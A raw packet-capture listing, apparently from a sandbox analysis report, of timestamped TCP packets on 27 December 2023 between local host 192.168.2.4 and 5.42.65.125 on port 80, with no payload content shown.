Dec 27, 2023 17:57:25.962949038 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 17:57:25.962955952 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 17:57:25.962979078 CET	49738	80	192.168.2.4	5.42.65.125
Dec 27, 2023 17:57:25.963036060 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 17:57:25.963033915 CET	49738	80	192.168.2.4	5.42.65.125
Dec 27, 2023 17:57:25.963052034 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 17:57:25.963071108 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 17:57:25.963077068 CET	49738	80	192.168.2.4	5.42.65.125
Dec 27, 2023 17:57:25.963079929 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 17:57:25.963124037 CET	49738	80	192.168.2.4	5.42.65.125
Dec 27, 2023 17:57:25.963156939 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 17:57:25.963184118 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 17:57:25.963193893 CET	49738	80	192.168.2.4	5.42.65.125
Dec 27, 2023 17:57:25.963197947 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 17:57:25.963244915 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 17:57:25.963252068 CET	49738	80	192.168.2.4	5.42.65.125
Dec 27, 2023 17:57:25.963264942 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 17:57:25.963284969 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 17:57:25.963299036 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 17:57:25.963313103 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 17:57:25.963325024 CET	49738	80	192.168.2.4	5.42.65.125
Dec 27, 2023 17:57:25.963329077 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 17:57:25.963346004 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 17:57:25.963346958 CET	49738	80	192.168.2.4	5.42.65.125
Dec 27, 2023 17:57:25.963404894 CET	49738	80	192.168.2.4	5.42.65.125
Dec 27, 2023 17:57:25.964000940 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 17:57:25.964015961 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 17:57:25.964024067 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 17:57:25.964030981 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 17:57:25.964047909 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 17:57:25.964063883 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 17:57:25.964076996 CET	49738	80	192.168.2.4	5.42.65.125
Dec 27, 2023 17:57:25.964095116 CET	49738	80	192.168.2.4	5.42.65.125
Dec 27, 2023 17:57:25.964102030 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 17:57:25.964121103 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 17:57:25.964155912 CET	49738	80	192.168.2.4	5.42.65.125
Dec 27, 2023 17:57:25.964194059 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 17:57:25.964209080 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 17:57:25.964221001 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 17:57:25.964245081 CET	49738	80	192.168.2.4	5.42.65.125
Dec 27, 2023 17:57:25.964293003 CET	49738	80	192.168.2.4	5.42.65.125
Dec 27, 2023 17:57:25.966247082 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 17:57:25.966263056 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 17:57:25.966305971 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 17:57:25.966310978 CET	49738	80	192.168.2.4	5.42.65.125
Dec 27, 2023 17:57:25.966322899 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 17:57:25.966340065 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 17:57:25.966355085 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 17:57:25.966367960 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 17:57:25.966379881 CET	49738	80	192.168.2.4	5.42.65.125
Dec 27, 2023 17:57:25.966383934 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 17:57:25.966403008 CET	49738	80	192.168.2.4	5.42.65.125
Dec 27, 2023 17:57:25.966406107 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 17:57:25.966419935 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 17:57:25.966423988 CET	49738	80	192.168.2.4	5.42.65.125
Dec 27, 2023 17:57:25.966435909 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 17:57:25.966451883 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 17:57:25.966455936 CET	49738	80	192.168.2.4	5.42.65.125
Dec 27, 2023 17:57:25.966468096 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 17:57:25.966505051 CET	49738	80	192.168.2.4	5.42.65.125
Dec 27, 2023 17:57:25.966634989 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 17:57:25.966672897 CET	49738	80	192.168.2.4	5.42.65.125
Dec 27, 2023 17:57:25.966681004 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 17:57:25.966708899 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 17:57:25.966723919 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 17:57:25.966757059 CET	49738	80	192.168.2.4	5.42.65.125
Dec 27, 2023 17:57:25.966806889 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 17:57:25.966823101 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 17:57:25.966835022 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 17:57:25.966847897 CET	49738	80	192.168.2.4	5.42.65.125
Dec 27, 2023 17:57:25.966849089 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 17:57:25.966866016 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 17:57:25.966867924 CET	49738	80	192.168.2.4	5.42.65.125
Dec 27, 2023 17:57:25.966881037 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 17:57:25.966895103 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 17:57:25.966907024 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 17:57:25.966913939 CET	49738	80	192.168.2.4	5.42.65.125
Dec 27, 2023 17:57:25.966923952 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 17:57:25.966938972 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 17:57:25.966939926 CET	49738	80	192.168.2.4	5.42.65.125
Dec 27, 2023 17:57:25.966964006 CET	49738	80	192.168.2.4	5.42.65.125
Dec 27, 2023 17:57:25.968138933 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 17:57:25.968153000 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 17:57:25.968167067 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 17:57:25.968180895 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 17:57:25.968194008 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 17:57:25.968206882 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 17:57:25.968218088 CET	49738	80	192.168.2.4	5.42.65.125
Dec 27, 2023 17:57:25.968241930 CET	49738	80	192.168.2.4	5.42.65.125
Dec 27, 2023 17:57:25.968293905 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 17:57:25.968308926 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 17:57:25.968321085 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 17:57:25.968328953 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 17:57:25.968338013 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 17:57:25.968344927 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 17:57:25.968352079 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 17:57:25.968358994 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 17:57:25.968422890 CET	49738	80	192.168.2.4	5.42.65.125
Dec 27, 2023 17:57:25.968595028 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 17:57:25.968611956 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 17:57:25.968645096 CET	49738	80	192.168.2.4	5.42.65.125
Dec 27, 2023 17:57:25.968676090 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 17:57:25.968692064 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 17:57:25.968703032 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 17:57:25.968709946 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 17:57:25.968739986 CET	49738	80	192.168.2.4	5.42.65.125
Dec 27, 2023 17:57:25.968770981 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 17:57:25.968785048 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 17:57:25.968792915 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 17:57:25.968835115 CET	49738	80	192.168.2.4	5.42.65.125
Dec 27, 2023 17:57:25.969274044 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 17:57:25.969391108 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 17:57:25.969403982 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 17:57:25.969419003 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 17:57:25.969425917 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 17:57:25.969434023 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 17:57:25.969441891 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 17:57:25.969455004 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 17:57:25.969477892 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 17:57:25.969487906 CET	49738	80	192.168.2.4	5.42.65.125
Dec 27, 2023 17:57:25.969492912 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 17:57:25.969506979 CET	49738	80	192.168.2.4	5.42.65.125
Dec 27, 2023 17:57:25.969510078 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 17:57:25.969527960 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 17:57:25.969532967 CET	49738	80	192.168.2.4	5.42.65.125
Dec 27, 2023 17:57:25.969543934 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 17:57:25.969558001 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 17:57:25.969562054 CET	49738	80	192.168.2.4	5.42.65.125
Dec 27, 2023 17:57:25.969624043 CET	49738	80	192.168.2.4	5.42.65.125
Dec 27, 2023 17:57:25.970196009 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 17:57:25.970208883 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 17:57:25.970257044 CET	49738	80	192.168.2.4	5.42.65.125
Dec 27, 2023 17:57:25.970282078 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 17:57:25.970299006 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 17:57:25.970312119 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 17:57:25.970324993 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 17:57:25.970324993 CET	49738	80	192.168.2.4	5.42.65.125
Dec 27, 2023 17:57:25.970333099 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 17:57:25.970341921 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 17:57:25.970375061 CET	49738	80	192.168.2.4	5.42.65.125
Dec 27, 2023 17:57:25.970402002 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 17:57:25.970411062 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 17:57:25.970418930 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 17:57:25.970427990 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 17:57:25.970433950 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 17:57:25.970448971 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 17:57:25.970474958 CET	49738	80	192.168.2.4	5.42.65.125
Dec 27, 2023 17:57:25.970494986 CET	49738	80	192.168.2.4	5.42.65.125
Dec 27, 2023 17:57:25.982805014 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 17:57:25.982821941 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 17:57:25.982836008 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 17:57:25.982850075 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 17:57:25.982865095 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 17:57:25.982892036 CET	49738	80	192.168.2.4	5.42.65.125
Dec 27, 2023 17:57:25.982897043 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 17:57:25.982918024 CET	49738	80	192.168.2.4	5.42.65.125
Dec 27, 2023 17:57:25.982943058 CET	49738	80	192.168.2.4	5.42.65.125
Dec 27, 2023 17:57:25.982945919 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 17:57:25.982963085 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 17:57:25.982976913 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 17:57:25.982990980 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 17:57:25.982999086 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 17:57:25.983048916 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 17:57:25.983048916 CET	49738	80	192.168.2.4	5.42.65.125
Dec 27, 2023 17:57:25.983089924 CET	49738	80	192.168.2.4	5.42.65.125
Dec 27, 2023 17:57:25.983098984 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 17:57:25.983114004 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 17:57:25.983186960 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 17:57:25.983234882 CET	49738	80	192.168.2.4	5.42.65.125
Dec 27, 2023 17:57:25.983242989 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 17:57:25.983259916 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 17:57:25.983289957 CET	49738	80	192.168.2.4	5.42.65.125
Dec 27, 2023 17:57:25.983359098 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 17:57:25.983375072 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 17:57:25.983391047 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 17:57:25.983402014 CET	49738	80	192.168.2.4	5.42.65.125
Dec 27, 2023 17:57:25.983407021 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 17:57:25.983422041 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 17:57:25.983437061 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 17:57:25.983450890 CET	49738	80	192.168.2.4	5.42.65.125
Dec 27, 2023 17:57:25.983450890 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 17:57:25.983467102 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 17:57:25.983479977 CET	49738	80	192.168.2.4	5.42.65.125
Dec 27, 2023 17:57:25.983480930 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 17:57:25.983494997 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 17:57:25.983498096 CET	49738	80	192.168.2.4	5.42.65.125
Dec 27, 2023 17:57:25.983509064 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 17:57:25.983522892 CET	49738	80	192.168.2.4	5.42.65.125
Dec 27, 2023 17:57:25.983524084 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 17:57:25.983540058 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 17:57:25.983551979 CET	49738	80	192.168.2.4	5.42.65.125
Dec 27, 2023 17:57:25.983553886 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 17:57:25.983570099 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 17:57:25.983582020 CET	49738	80	192.168.2.4	5.42.65.125
Dec 27, 2023 17:57:25.983583927 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 17:57:25.983599901 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 17:57:25.983611107 CET	49738	80	192.168.2.4	5.42.65.125
Dec 27, 2023 17:57:25.983614922 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 17:57:25.983630896 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 17:57:25.983644009 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 17:57:25.983649015 CET	49738	80	192.168.2.4	5.42.65.125
Dec 27, 2023 17:57:25.983659983 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 17:57:25.983674049 CET	49738	80	192.168.2.4	5.42.65.125
Dec 27, 2023 17:57:25.983674049 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 17:57:25.983689070 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 17:57:25.983695030 CET	49738	80	192.168.2.4	5.42.65.125
Dec 27, 2023 17:57:25.983704090 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 17:57:25.983719110 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 17:57:25.983730078 CET	49738	80	192.168.2.4	5.42.65.125
Dec 27, 2023 17:57:25.983733892 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 17:57:25.983748913 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 17:57:25.983761072 CET	49738	80	192.168.2.4	5.42.65.125
Dec 27, 2023 17:57:25.983763933 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 17:57:25.983781099 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 17:57:25.983794928 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 17:57:25.983800888 CET	49738	80	192.168.2.4	5.42.65.125
Dec 27, 2023 17:57:25.983822107 CET	49738	80	192.168.2.4	5.42.65.125
Dec 27, 2023 17:57:25.983887911 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 17:57:25.983902931 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 17:57:25.983916998 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 17:57:25.983930111 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 17:57:25.983937025 CET	49738	80	192.168.2.4	5.42.65.125
Dec 27, 2023 17:57:25.983943939 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 17:57:25.983958960 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 17:57:25.983963013 CET	49738	80	192.168.2.4	5.42.65.125
Dec 27, 2023 17:57:25.983985901 CET	49738	80	192.168.2.4	5.42.65.125
Dec 27, 2023 17:57:25.984030962 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 17:57:25.984046936 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 17:57:25.984061003 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 17:57:25.984075069 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 17:57:25.984083891 CET	49738	80	192.168.2.4	5.42.65.125
Dec 27, 2023 17:57:25.984117031 CET	49738	80	192.168.2.4	5.42.65.125
Dec 27, 2023 17:57:25.984128952 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 17:57:25.984144926 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 17:57:25.984158993 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 17:57:25.984173059 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 17:57:25.984185934 CET	49738	80	192.168.2.4	5.42.65.125
Dec 27, 2023 17:57:25.984185934 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 17:57:25.984203100 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 17:57:25.984205008 CET	49738	80	192.168.2.4	5.42.65.125
Dec 27, 2023 17:57:25.984230042 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 17:57:25.984240055 CET	49738	80	192.168.2.4	5.42.65.125
Dec 27, 2023 17:57:25.984268904 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 17:57:25.984282970 CET	49738	80	192.168.2.4	5.42.65.125
Dec 27, 2023 17:57:25.984359026 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 17:57:25.984378099 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 17:57:25.984394073 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 17:57:25.984406948 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 17:57:25.984419107 CET	49738	80	192.168.2.4	5.42.65.125
Dec 27, 2023 17:57:25.984445095 CET	49738	80	192.168.2.4	5.42.65.125
Dec 27, 2023 17:57:25.984484911 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 17:57:25.984504938 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 17:57:25.984519005 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 17:57:25.984549046 CET	49738	80	192.168.2.4	5.42.65.125
Dec 27, 2023 17:57:25.984570026 CET	49738	80	192.168.2.4	5.42.65.125
Dec 27, 2023 17:57:25.984780073 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 17:57:25.984894991 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 17:57:25.984910965 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 17:57:25.984940052 CET	49738	80	192.168.2.4	5.42.65.125
Dec 27, 2023 17:57:25.985078096 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 17:57:25.985094070 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 17:57:25.985109091 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 17:57:25.985122919 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 17:57:25.985126019 CET	49738	80	192.168.2.4	5.42.65.125
Dec 27, 2023 17:57:25.985138893 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 17:57:25.985141993 CET	49738	80	192.168.2.4	5.42.65.125
Dec 27, 2023 17:57:25.985153913 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 17:57:25.985168934 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 17:57:25.985183001 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 17:57:25.985189915 CET	49738	80	192.168.2.4	5.42.65.125
Dec 27, 2023 17:57:25.985198975 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 17:57:25.985212088 CET	49738	80	192.168.2.4	5.42.65.125
Dec 27, 2023 17:57:25.985213995 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 17:57:25.985229969 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 17:57:25.985240936 CET	49738	80	192.168.2.4	5.42.65.125
Dec 27, 2023 17:57:25.985276937 CET	49738	80	192.168.2.4	5.42.65.125
Dec 27, 2023 17:57:25.985774040 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 17:57:25.985790968 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 17:57:25.985820055 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 17:57:25.985836029 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 17:57:25.985848904 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 17:57:25.985862017 CET	49738	80	192.168.2.4	5.42.65.125
Dec 27, 2023 17:57:25.985867023 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 17:57:25.985884905 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 17:57:25.985887051 CET	49738	80	192.168.2.4	5.42.65.125
Dec 27, 2023 17:57:25.985901117 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 17:57:25.985913992 CET	49738	80	192.168.2.4	5.42.65.125
Dec 27, 2023 17:57:25.985934019 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 17:57:25.985937119 CET	49738	80	192.168.2.4	5.42.65.125
Dec 27, 2023 17:57:25.985951900 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 17:57:25.985996008 CET	49738	80	192.168.2.4	5.42.65.125
Dec 27, 2023 17:57:25.986002922 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 17:57:25.986017942 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 17:57:25.986031055 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 17:57:25.986044884 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 17:57:25.986057043 CET	49738	80	192.168.2.4	5.42.65.125
Dec 27, 2023 17:57:25.986772060 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 17:57:25.986787081 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 17:57:25.986802101 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 17:57:25.986816883 CET	49738	80	192.168.2.4	5.42.65.125
Dec 27, 2023 17:57:25.986818075 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 17:57:25.986841917 CET	49738	80	192.168.2.4	5.42.65.125
Dec 27, 2023 17:57:25.986860991 CET	49738	80	192.168.2.4	5.42.65.125
Dec 27, 2023 17:57:25.986918926 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 17:57:25.986933947 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 17:57:25.986946106 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 17:57:25.986954927 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 17:57:25.986962080 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 17:57:25.986968994 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 17:57:25.986975908 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 17:57:25.986984968 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 17:57:25.986999035 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 17:57:25.987005949 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 17:57:25.987026930 CET	49738	80	192.168.2.4	5.42.65.125
Dec 27, 2023 17:57:25.987097979 CET	49738	80	192.168.2.4	5.42.65.125
Dec 27, 2023 17:57:25.987651110 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 17:57:25.987668037 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 17:57:25.987710953 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 17:57:25.987726927 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 17:57:25.987740040 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 17:57:25.987757921 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 17:57:25.987760067 CET	49738	80	192.168.2.4	5.42.65.125
Dec 27, 2023 17:57:25.987773895 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 17:57:25.987785101 CET	49738	80	192.168.2.4	5.42.65.125
Dec 27, 2023 17:57:25.987788916 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 17:57:25.987806082 CET	49738	80	192.168.2.4	5.42.65.125
Dec 27, 2023 17:57:25.987865925 CET	49738	80	192.168.2.4	5.42.65.125
Dec 27, 2023 17:57:25.988151073 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 17:57:25.988168955 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 17:57:25.988177061 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 17:57:25.988187075 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 17:57:25.988193989 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 17:57:25.988239050 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 17:57:25.988241911 CET	49738	80	192.168.2.4	5.42.65.125
Dec 27, 2023 17:57:25.988259077 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 17:57:25.988285065 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 17:57:25.988292933 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 17:57:25.988334894 CET	49738	80	192.168.2.4	5.42.65.125
Dec 27, 2023 17:57:25.988382101 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 17:57:25.988396883 CET	80	49738	5.42.65.125	192.168.2.4
